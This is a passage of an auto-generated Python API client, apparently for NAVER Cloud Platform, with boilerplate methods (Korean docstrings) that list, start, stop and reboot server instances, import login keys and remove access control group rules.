:param GetServerInstanceDetailRequest get_server_instance_detail_request: getServerInstanceDetailRequest (required)
:return: GetServerInstanceDetailResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['get_server_instance_detail_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_server_instance_detail" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'get_server_instance_detail_request' is set
if ('get_server_instance_detail_request' not in params or
params['get_server_instance_detail_request'] is None):
raise ValueError("Missing the required parameter `get_server_instance_detail_request` when calling `get_server_instance_detail`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'get_server_instance_detail_request' in params:
body_params = params['get_server_instance_detail_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/getServerInstanceDetail', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetServerInstanceDetailResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_server_instance_list(self, get_server_instance_list_request, **kwargs): # noqa: E501
"""get_server_instance_list # noqa: E501
서버인스턴스리스트조회 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_server_instance_list(get_server_instance_list_request, async=True)
>>> result = thread.get()
:param async bool
:param GetServerInstanceListRequest get_server_instance_list_request: getServerInstanceListRequest (required)
:return: GetServerInstanceListResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_server_instance_list_with_http_info(get_server_instance_list_request, **kwargs) # noqa: E501
else:
(data) = self.get_server_instance_list_with_http_info(get_server_instance_list_request, **kwargs) # noqa: E501
return data
def get_server_instance_list_with_http_info(self, get_server_instance_list_request, **kwargs): # noqa: E501
"""get_server_instance_list # noqa: E501
서버인스턴스리스트조회 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_server_instance_list_with_http_info(get_server_instance_list_request, async=True)
>>> result = thread.get()
:param async bool
:param GetServerInstanceListRequest get_server_instance_list_request: getServerInstanceListRequest (required)
:return: GetServerInstanceListResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['get_server_instance_list_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_server_instance_list" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'get_server_instance_list_request' is set
if ('get_server_instance_list_request' not in params or
params['get_server_instance_list_request'] is None):
raise ValueError("Missing the required parameter `get_server_instance_list_request` when calling `get_server_instance_list`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'get_server_instance_list_request' in params:
body_params = params['get_server_instance_list_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/getServerInstanceList', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetServerInstanceListResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_server_product_list(self, get_server_product_list_request, **kwargs): # noqa: E501
"""get_server_product_list # noqa: E501
서버상품리스트조회 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_server_product_list(get_server_product_list_request, async=True)
>>> result = thread.get()
:param async bool
:param GetServerProductListRequest get_server_product_list_request: getServerProductListRequest (required)
:return: GetServerProductListResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_server_product_list_with_http_info(get_server_product_list_request, **kwargs) # noqa: E501
else:
(data) = self.get_server_product_list_with_http_info(get_server_product_list_request, **kwargs) # noqa: E501
return data
def get_server_product_list_with_http_info(self, get_server_product_list_request, **kwargs): # noqa: E501
"""get_server_product_list # noqa: E501
서버상품리스트조회 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_server_product_list_with_http_info(get_server_product_list_request, async=True)
>>> result = thread.get()
:param async bool
:param GetServerProductListRequest get_server_product_list_request: getServerProductListRequest (required)
:return: GetServerProductListResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['get_server_product_list_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_server_product_list" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'get_server_product_list_request' is set
if ('get_server_product_list_request' not in params or
params['get_server_product_list_request'] is None):
raise ValueError("Missing the required parameter `get_server_product_list_request` when calling `get_server_product_list`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'get_server_product_list_request' in params:
body_params = params['get_server_product_list_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/getServerProductList', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetServerProductListResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_zone_list(self, get_zone_list_request, **kwargs): # noqa: E501
"""get_zone_list # noqa: E501
ZONE리스트조회 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_zone_list(get_zone_list_request, async=True)
>>> result = thread.get()
:param async bool
:param GetZoneListRequest get_zone_list_request: getZoneListRequest (required)
:return: GetZoneListResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_zone_list_with_http_info(get_zone_list_request, **kwargs) # noqa: E501
else:
(data) = self.get_zone_list_with_http_info(get_zone_list_request, **kwargs) # noqa: E501
return data
def get_zone_list_with_http_info(self, get_zone_list_request, **kwargs): # noqa: E501
"""get_zone_list # noqa: E501
ZONE리스트조회 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_zone_list_with_http_info(get_zone_list_request, async=True)
>>> result = thread.get()
:param async bool
:param GetZoneListRequest get_zone_list_request: getZoneListRequest (required)
:return: GetZoneListResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['get_zone_list_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_zone_list" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'get_zone_list_request' is set
if ('get_zone_list_request' not in params or
params['get_zone_list_request'] is None):
raise ValueError("Missing the required parameter `get_zone_list_request` when calling `get_zone_list`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'get_zone_list_request' in params:
body_params = params['get_zone_list_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/getZoneList', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetZoneListResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def import_login_key(self, import_login_key_request, **kwargs): # noqa: E501
"""import_login_key # noqa: E501
사용자가생성한로그인키import # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.import_login_key(import_login_key_request, async=True)
>>> result = thread.get()
:param async bool
:param ImportLoginKeyRequest import_login_key_request: importLoginKeyRequest (required)
:return: ImportLoginKeyResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.import_login_key_with_http_info(import_login_key_request, **kwargs) # noqa: E501
else:
(data) = self.import_login_key_with_http_info(import_login_key_request, **kwargs) # noqa: E501
return data
def import_login_key_with_http_info(self, import_login_key_request, **kwargs): # noqa: E501
"""import_login_key # noqa: E501
사용자가생성한로그인키import # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.import_login_key_with_http_info(import_login_key_request, async=True)
>>> result = thread.get()
:param async bool
:param ImportLoginKeyRequest import_login_key_request: importLoginKeyRequest (required)
:return: ImportLoginKeyResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['import_login_key_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method import_login_key" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'import_login_key_request' is set
if ('import_login_key_request' not in params or
params['import_login_key_request'] is None):
raise ValueError("Missing the required parameter `import_login_key_request` when calling `import_login_key`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'import_login_key_request' in params:
body_params = params['import_login_key_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/importLoginKey', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ImportLoginKeyResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def reboot_server_instances(self, reboot_server_instances_request, **kwargs): # noqa: E501
"""reboot_server_instances # noqa: E501
서버인스턴스재시작 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.reboot_server_instances(reboot_server_instances_request, async=True)
>>> result = thread.get()
:param async bool
:param RebootServerInstancesRequest reboot_server_instances_request: rebootServerInstancesRequest (required)
:return: RebootServerInstancesResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.reboot_server_instances_with_http_info(reboot_server_instances_request, **kwargs) # noqa: E501
else:
(data) = self.reboot_server_instances_with_http_info(reboot_server_instances_request, **kwargs) # noqa: E501
return data
def reboot_server_instances_with_http_info(self, reboot_server_instances_request, **kwargs): # noqa: E501
"""reboot_server_instances # noqa: E501
서버인스턴스재시작 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.reboot_server_instances_with_http_info(reboot_server_instances_request, async=True)
>>> result = thread.get()
:param async bool
:param RebootServerInstancesRequest reboot_server_instances_request: rebootServerInstancesRequest (required)
:return: RebootServerInstancesResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['reboot_server_instances_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method reboot_server_instances" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'reboot_server_instances_request' is set
if ('reboot_server_instances_request' not in params or
params['reboot_server_instances_request'] is None):
raise ValueError("Missing the required parameter `reboot_server_instances_request` when calling `reboot_server_instances`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'reboot_server_instances_request' in params:
body_params = params['reboot_server_instances_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/rebootServerInstances', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='RebootServerInstancesResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def remove_access_control_group_inbound_rule(self, remove_access_control_group_inbound_rule_request, **kwargs): # noqa: E501
"""remove_access_control_group_inbound_rule # noqa: E501
ACGInboundRule삭제 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.remove_access_control_group_inbound_rule(remove_access_control_group_inbound_rule_request, async=True)
>>> result = thread.get()
:param async bool
:param RemoveAccessControlGroupInboundRuleRequest remove_access_control_group_inbound_rule_request: removeAccessControlGroupInboundRuleRequest (required)
:return: RemoveAccessControlGroupInboundRuleResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.remove_access_control_group_inbound_rule_with_http_info(remove_access_control_group_inbound_rule_request, **kwargs) # noqa: E501
else:
(data) = self.remove_access_control_group_inbound_rule_with_http_info(remove_access_control_group_inbound_rule_request, **kwargs) # noqa: E501
return data
def remove_access_control_group_inbound_rule_with_http_info(self, remove_access_control_group_inbound_rule_request, **kwargs): # noqa: E501
"""remove_access_control_group_inbound_rule # noqa: E501
ACGInboundRule삭제 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.remove_access_control_group_inbound_rule_with_http_info(remove_access_control_group_inbound_rule_request, async=True)
>>> result = thread.get()
:param async bool
:param RemoveAccessControlGroupInboundRuleRequest remove_access_control_group_inbound_rule_request: removeAccessControlGroupInboundRuleRequest (required)
:return: RemoveAccessControlGroupInboundRuleResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['remove_access_control_group_inbound_rule_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method remove_access_control_group_inbound_rule" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'remove_access_control_group_inbound_rule_request' is set
if ('remove_access_control_group_inbound_rule_request' not in params or
params['remove_access_control_group_inbound_rule_request'] is None):
raise ValueError("Missing the required parameter `remove_access_control_group_inbound_rule_request` when calling `remove_access_control_group_inbound_rule`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'remove_access_control_group_inbound_rule_request' in params:
body_params = params['remove_access_control_group_inbound_rule_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/removeAccessControlGroupInboundRule', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='RemoveAccessControlGroupInboundRuleResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def remove_access_control_group_outbound_rule(self, remove_access_control_group_outbound_rule_request, **kwargs): # noqa: E501
"""remove_access_control_group_outbound_rule # noqa: E501
ACGOutboundRule삭제 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.remove_access_control_group_outbound_rule(remove_access_control_group_outbound_rule_request, async=True)
>>> result = thread.get()
:param async bool
:param RemoveAccessControlGroupOutboundRuleRequest remove_access_control_group_outbound_rule_request: removeAccessControlGroupOutboundRuleRequest (required)
:return: RemoveAccessControlGroupOutboundRuleResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.remove_access_control_group_outbound_rule_with_http_info(remove_access_control_group_outbound_rule_request, **kwargs) # noqa: E501
else:
(data) = self.remove_access_control_group_outbound_rule_with_http_info(remove_access_control_group_outbound_rule_request, **kwargs) # noqa: E501
return data
def remove_access_control_group_outbound_rule_with_http_info(self, remove_access_control_group_outbound_rule_request, **kwargs): # noqa: E501
"""remove_access_control_group_outbound_rule # noqa: E501
ACGOutboundRule삭제 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.remove_access_control_group_outbound_rule_with_http_info(remove_access_control_group_outbound_rule_request, async=True)
>>> result = thread.get()
:param async bool
:param RemoveAccessControlGroupOutboundRuleRequest remove_access_control_group_outbound_rule_request: removeAccessControlGroupOutboundRuleRequest (required)
:return: RemoveAccessControlGroupOutboundRuleResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['remove_access_control_group_outbound_rule_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method remove_access_control_group_outbound_rule" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'remove_access_control_group_outbound_rule_request' is set
if ('remove_access_control_group_outbound_rule_request' not in params or
params['remove_access_control_group_outbound_rule_request'] is None):
raise ValueError("Missing the required parameter `remove_access_control_group_outbound_rule_request` when calling `remove_access_control_group_outbound_rule`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'remove_access_control_group_outbound_rule_request' in params:
body_params = params['remove_access_control_group_outbound_rule_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/removeAccessControlGroupOutboundRule', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='RemoveAccessControlGroupOutboundRuleResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def remove_network_interface_access_control_group(self, remove_network_interface_access_control_group_request, **kwargs): # noqa: E501
"""remove_network_interface_access_control_group # noqa: E501
네트워크인터페이스의ACG제거 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.remove_network_interface_access_control_group(remove_network_interface_access_control_group_request, async=True)
>>> result = thread.get()
:param async bool
:param RemoveNetworkInterfaceAccessControlGroupRequest remove_network_interface_access_control_group_request: removeNetworkInterfaceAccessControlGroupRequest (required)
:return: RemoveNetworkInterfaceAccessControlGroupResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.remove_network_interface_access_control_group_with_http_info(remove_network_interface_access_control_group_request, **kwargs) # noqa: E501
else:
(data) = self.remove_network_interface_access_control_group_with_http_info(remove_network_interface_access_control_group_request, **kwargs) # noqa: E501
return data
def remove_network_interface_access_control_group_with_http_info(self, remove_network_interface_access_control_group_request, **kwargs): # noqa: E501
"""remove_network_interface_access_control_group # noqa: E501
네트워크인터페이스의ACG제거 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.remove_network_interface_access_control_group_with_http_info(remove_network_interface_access_control_group_request, async=True)
>>> result = thread.get()
:param async bool
:param RemoveNetworkInterfaceAccessControlGroupRequest remove_network_interface_access_control_group_request: removeNetworkInterfaceAccessControlGroupRequest (required)
:return: RemoveNetworkInterfaceAccessControlGroupResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['remove_network_interface_access_control_group_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method remove_network_interface_access_control_group" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'remove_network_interface_access_control_group_request' is set
if ('remove_network_interface_access_control_group_request' not in params or
params['remove_network_interface_access_control_group_request'] is None):
raise ValueError("Missing the required parameter `remove_network_interface_access_control_group_request` when calling `remove_network_interface_access_control_group`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'remove_network_interface_access_control_group_request' in params:
body_params = params['remove_network_interface_access_control_group_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/removeNetworkInterfaceAccessControlGroup', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='RemoveNetworkInterfaceAccessControlGroupResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def remove_placement_group_server_instance(self, remove_placement_group_server_instance_request, **kwargs): # noqa: E501
"""remove_placement_group_server_instance # noqa: E501
물리배치그룹에서서버인스턴스제거 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.remove_placement_group_server_instance(remove_placement_group_server_instance_request, async=True)
>>> result = thread.get()
:param async bool
:param RemovePlacementGroupServerInstanceRequest remove_placement_group_server_instance_request: removePlacementGroupServerInstanceRequest (required)
:return: RemovePlacementGroupServerInstanceResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.remove_placement_group_server_instance_with_http_info(remove_placement_group_server_instance_request, **kwargs) # noqa: E501
else:
(data) = self.remove_placement_group_server_instance_with_http_info(remove_placement_group_server_instance_request, **kwargs) # noqa: E501
return data
def remove_placement_group_server_instance_with_http_info(self, remove_placement_group_server_instance_request, **kwargs): # noqa: E501
"""remove_placement_group_server_instance # noqa: E501
물리배치그룹에서서버인스턴스제거 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.remove_placement_group_server_instance_with_http_info(remove_placement_group_server_instance_request, async=True)
>>> result = thread.get()
:param async bool
:param RemovePlacementGroupServerInstanceRequest remove_placement_group_server_instance_request: removePlacementGroupServerInstanceRequest (required)
:return: RemovePlacementGroupServerInstanceResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['remove_placement_group_server_instance_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method remove_placement_group_server_instance" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'remove_placement_group_server_instance_request' is set
if ('remove_placement_group_server_instance_request' not in params or
params['remove_placement_group_server_instance_request'] is None):
raise ValueError("Missing the required parameter `remove_placement_group_server_instance_request` when calling `remove_placement_group_server_instance`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'remove_placement_group_server_instance_request' in params:
body_params = params['remove_placement_group_server_instance_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/removePlacementGroupServerInstance', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='RemovePlacementGroupServerInstanceResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def start_server_instances(self, start_server_instances_request, **kwargs): # noqa: E501
"""start_server_instances # noqa: E501
서버인스턴스시작 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.start_server_instances(start_server_instances_request, async=True)
>>> result = thread.get()
:param async bool
:param StartServerInstancesRequest start_server_instances_request: startServerInstancesRequest (required)
:return: StartServerInstancesResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.start_server_instances_with_http_info(start_server_instances_request, **kwargs) # noqa: E501
else:
(data) = self.start_server_instances_with_http_info(start_server_instances_request, **kwargs) # noqa: E501
return data
def start_server_instances_with_http_info(self, start_server_instances_request, **kwargs): # noqa: E501
"""start_server_instances # noqa: E501
서버인스턴스시작 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.start_server_instances_with_http_info(start_server_instances_request, async=True)
>>> result = thread.get()
:param async bool
:param StartServerInstancesRequest start_server_instances_request: startServerInstancesRequest (required)
:return: StartServerInstancesResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['start_server_instances_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method start_server_instances" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'start_server_instances_request' is set
if ('start_server_instances_request' not in params or
params['start_server_instances_request'] is None):
raise ValueError("Missing the required parameter `start_server_instances_request` when calling `start_server_instances`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'start_server_instances_request' in params:
body_params = params['start_server_instances_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/startServerInstances', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='StartServerInstancesResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def stop_server_instances(self, stop_server_instances_request, **kwargs): # noqa: E501
"""stop_server_instances # noqa: E501
서버인스턴스정지 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.stop_server_instances(stop_server_instances_request, async=True)
>>> result = thread.get()
:param async bool
:param StopServerInstancesRequest stop_server_instances_request: stopServerInstancesRequest (required)
:return: StopServerInstancesResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.stop_server_instances_with_http_info(stop_server_instances_request, **kwargs) # noqa: E501
else:
(data) = self.stop_server_instances_with_http_info(stop_server_instances_request, **kwargs) # noqa: E501
return data
